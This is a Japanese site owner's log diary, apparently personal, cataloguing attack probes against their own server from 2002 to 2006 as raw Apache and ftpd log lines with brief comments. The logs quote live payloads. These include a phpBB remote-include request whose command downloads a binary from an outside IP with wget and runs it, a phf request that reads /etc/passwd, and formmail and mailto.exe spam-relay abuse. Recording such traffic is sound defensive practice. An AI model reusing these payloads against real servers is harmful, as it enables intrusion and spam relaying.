I&U Home > うにまま(仮) ・ 謎ログの友 ・ パスワードコレクション ・ FormMail Scanners
[all] [apache] exploit [ftp] [robot] [webalizer] [SEO_SPAM] [others]
[exploit] Mambo Serveの脆弱性を探るアクセス
[exploit] phpMyAdmin
[exploit] ELF_KAIGENT.C
[exploit] 偶然なんだろうけれど
[exploit] お初にお目にかかったので:mkd _K4e
[exploit] 組み合わせの妙
[exploit] スキャンスクリプト
[exploit] "GET /NULL.printer"
[exploit] トネリング狙い
[exploit] "GET /scripts/nsiislog.dll" - MS03-019の脆弱性を狙った攻撃
[exploit] Nikto/1.30によるスキャン
[exploit] PHPスクリプトをさぐる動き
[exploit] "GET /cfdocs/expeval/ExprCalc.cfm" Cold Fusion のサンプルスクリプトを狙った攻撃
[exploit] メール送信スクリプトを狙う攻撃
[exploit] "SEARCH / HTTP/1.1"
[exploit] パスワードリストによる攻撃
[exploit] しつこいスキャン
[exploit] ano@ano.com
[exploit] msadcs.dll
[exploit] Pub Maker
[exploit] ano@ano.com
go
[exploit] 粘着君
[exploit] @here.com
[exploit] sss@
[exploit] 今度はmailto.exe
[exploit] ano ano com
go
[exploit] formmail ふたたび
[exploit] refer偽造
[exploit] SuperScanの足跡
[exploit] FrontPage2000の脆弱性
[exploit] proxy サービスはしておりません
[exploit] お盆でお休みしている間に、、、アタックその2
[exploit] お盆でお休みしている間に、、、アタックその1
[exploit] formmail続報
[exploit] formmail.pl/formmail.cgiにセキュリティホールがあるらしい
[exploit] anonymous@ftp.microsoft.com 続報
[exploit] 踏み台攻撃?
[exploit] 気をつけよう
謎ログ index
Name: 69-56-146-210.theplanet.com
Address: 69.56.146.210
83.17.221.182 - - [21/Feb/2006:04:26:00 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 291 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:37:12 +0900] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 295 "-" "-"
221.25.90.15 - - [20/Feb/2006:03:24:31 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.25.90.15 - - [20/Feb/2006:03:24:32 +0900] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
Nov 17 11:43:15 myhost ftpd[25380]: FTPD: connection from defense-4-81-57-92-161.fbx.proxa at Mon Nov 17 11:43:15 2003
Nov 17 11:43:15 myhost ftpd[25380]: <--- 220
Oct 8 23:57:25 myhost ftpd[12560]: FTPD: connection from pD9E40E3F.dip.t-dialin.net at Wed Oct 8 23:57:25 2003
Oct 8 23:57:25 myhost ftpd[12560]: <--- 220
210.51.181.114 - - [06/Sep/2003:16:12:55 +0900] "\x04\x01" 501 - "-" "-"
210.51.181.114 - - [06/Sep/2003:16:13:15 +0900] "\x05\x01" 501 - "-" "-"
212.179.35.101 - - [02/Sep/2003:09:47:05 +0900] "GET / HTTP/1.0" 200 3923 "-" "-"
212.179.35.101 - - [02/Sep/2003:09:47:05 +0900] "GET / HTTP/1.0" 200 3923 "-" "-"
24.123.170.99 - - [08/Aug/2003:07:27:47 +0900] "GET /NULL.printer" 404 - "-" "-"
12.218.107.176 - - [04/Aug/2003:18:28:57 +0900] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 309 "-" "-"
12.218.107.176 - - [04/Aug/2003:18:28:59 +0900] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 309 "-" "-"
211.181.212.10 - - [16/Jul/2003:08:56:32 +0900] "GET /scripts/nsiislog.dll" 404 - "-" "-"
80.139.104.127 - - [21/Jul/2003:10:47:04 +0900] "GET /scripts/nsiislog.dll" 404 - "-" "-"
212.92.77.254 - - [24/Jul/2003:01:31:16 +0900] "GET / HTTP/1.1" 200 3923 "-" "libwhisker/1.6"
212.92.77.254 - - [24/Jul/2003:01:31:17 +0900] "GET /Nikto-1.30-nexWS82JrkAwEdao7u.htm HTTP/1.1" 404 317 "-" "Mozilla/4.75 (Nikto/1.30 )"
217.162.194.164 - - [17/Jul/2003:21:42:02 +0900] "GET / HTTP/1.0" 200 3923 "-" "-"
217.162.194.164 - - [17/Jul/2003:21:42:05 +0900] "GET /index.php HTTP/1.0" 404 281 "-" "-"
212.202.40.10 - - [26/Jun/2003:07:10:26 +0900] "GET /cfdocs/expeval/ExprCalc.cfm HTTP/1.0" 404 299 "-" "-"
211.233.27.208 - - [26/Jun/2003:02:07:56 +0900] "POST /cgi-bin/sendmail.cgi HTTP/1.0" 404 289 "http://mydomain.xxx.xxx.xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q12484)"
192.148.139.178 - - [26/Jun/2003:02:07:56 +0900] "POST /cgi-bin/sendmail.asp HTTP/1.0" 404 289 "http://mydomain.xxx.xxx.xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q12484)"
203.15.69.139 - - [24/Jun/2003:07:17:12 +0900] "SEARCH / HTTP/1.1" 501 344 "-" "-"
Jun 22 09:44:47 myhost ftpd[24002]: FTPD: connection from APlessis-Bouchard-101-2-1-53.w19 at Sun Jun 22 09:44:47 2003
Jun 22 09:44:47 myhost ftpd[24002]: <--- 220
217.227.77.239 - - [30/Mar/2003:00:11:55 +0900] "HEAD / HTTP/1.0" 200 0 "-" "-"
217.227.77.239 - - [30/Mar/2003:00:11:56 +0900] "GET /.pl HTTP/1.0" 404 275 "-" "-"
208.203.70.195 - - [08/Nov/2002:10:56:37 +0900] "GET /msadc/msadcs.dll HTTP/1.0" 404 288 "-" "-"
208.203.70.195 - - [08/Nov/2002:10:56:38 +0900] "GET /msadc/msadcs.dll HTTP/1.0" 404 288 "-" "-"
Nov 10 14:05:20 myhost ftpd[22995]: FTPD: connection from pc-outside.uni-greifswald.de at Sun Nov 10 14:05:20 2002
Nov 10 14:05:20 myhost ftpd[22995]: <--- 220
粘着くん発見 → ろぐ
Oct 25 03:22:54 myhost ftpd[24850]: FTPD: connection from ca-bordeaux-13-232.abo.wanadoo.f at Fri Oct 25 03:22:54 2002
Oct 25 03:22:54 myhost ftpd[24850]: <--- 220
Oct 10 23:51:59 myhost ftpd[2723]: FTPD: connection from 213.226.134.110 at Thu Oct 10 23:51:59 2002
Oct 10 23:51:59 myhost ftpd[2723]: <--- 220
217.52.46.8 - - [24/Sep/2002:16:25:49 +0900] "GET /scripts/mailto.exe?sendto=bulkcop@yahoo.com&subject=mydomain/scripts/mailto.exe&email=rockstar@mail.com&message=rockstar HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.52.46.8 - - [24/Sep/2002:16:25:49 +0900] "GET /cgi-bin/mailto.exe?sendto=bulkcop@yahoo.com&subject=mydomain/cgi-bin/mailto.exe&email=rockstar@mail.com&message=rockstar HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Sep 19 02:15:35 myhost ftpd[2300]: FTPD: connection from pD951ED19.dip.t-dialin.net at Thu Sep 19 02:15:35 2002
80.3.64.5 - - [19/Sep/2002:06:54:41 +0900] "HEAD /cgi-bin/formmail.pl HTTP/1.0" 404 0 "http://mydomain/" "-"
80.3.64.5 - - [19/Sep/2002:06:54:42 +0900] "HEAD /cgi-bin/formmail.cgi HTTP/1.1" 404 0 "http://mydomain/" "-"
209.142.168.7 - - [11/Sep/2002:08:22:25 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 291 "http://gib.genes.nig.ac.jp/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
209.142.168.7 - - [11/Sep/2002:08:22:29 +0900] "GET / HTTP/1.0" 200 3906 "http://mydomain/cgi-bin/formmail.pl" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
Sep 6 06:05:46 myhost ftpd[22667]: FTPD: connection from 217.172.194.74 at Fri Sep 6 06:05:46 2002
Sep 6 06:05:46 myhost ftpd[22667]: <--- 220
長いので適当なところで折り曲げているけど、
158.252.215.43 - - [21/Aug/2002:00:34:24 +0900] "CONNECT mx2.mail.yahoo.com:25 HTTP/1.0" 405 309
213.37.58.178 - - [21/Aug/2002:15:35:52 +0900] "GET http://mytest.maddock.net/cgi-bin/myinfo HTTP/1.1" 404 298
ところが、こちらはかなり執拗。14日から17日にかけて31回も接続があった。
最初は IE で、その後はおそらく手動で、そして smartFTP。
この FTP scan の特徴( AFS.TXT と sss@servxxa.com)で検索してみたところ、
64.48.129.24 - - [15/Jul/2002:08:03:15 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 291
64.48.129.24 - - [15/Jul/2002:08:03:19 +0900] "POST /cgi-bin/formmail.cgi HTTP/1.0" 404 292
24.26.60.165 - - [24/Jun/2002:01:17:21 +0900] "GET /cgi-bin/formmail.pl?recipient=ASLEEPYANA@aol.com&subject=http://xxx.xxx.xxx.jp/cgi-bin/formmail.pl&body=JupZ&email=srt@aol.com HTTP/1.1" 404 300
24.26.60.165 - - [24/Jun/2002:01:17:21 +0900] "GET /cgi-bin/formmail.cgi?recipient=ASLEEPYANA@aol.com&subject=http://xxx.xxx.xxx.jp/cgi-bin/formmail.cgi&body=JupZ&email=mim@aol.com HTTP/1.1" 404 301
ftpd のログをチェックしていて気づいたのだが、anonymous@ftp.microsoft.com ログと ○gpuser 攻撃(勝手に命名)には関連があるようだ。
Mar 10 06:23:37 myhost ftpd[3735]: FTPD: connection from modemcable091.124-202-24.mtl.mc. at Sun Mar 10 06:23:37 2002
Mar 10 06:23:37 myhost ftpd[3735]: <--- 220
"GET /phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 274
I&U Home >
うにまま(仮) ・
謎ログの友 ・
パスワードコレクション ・
FormMail Scanners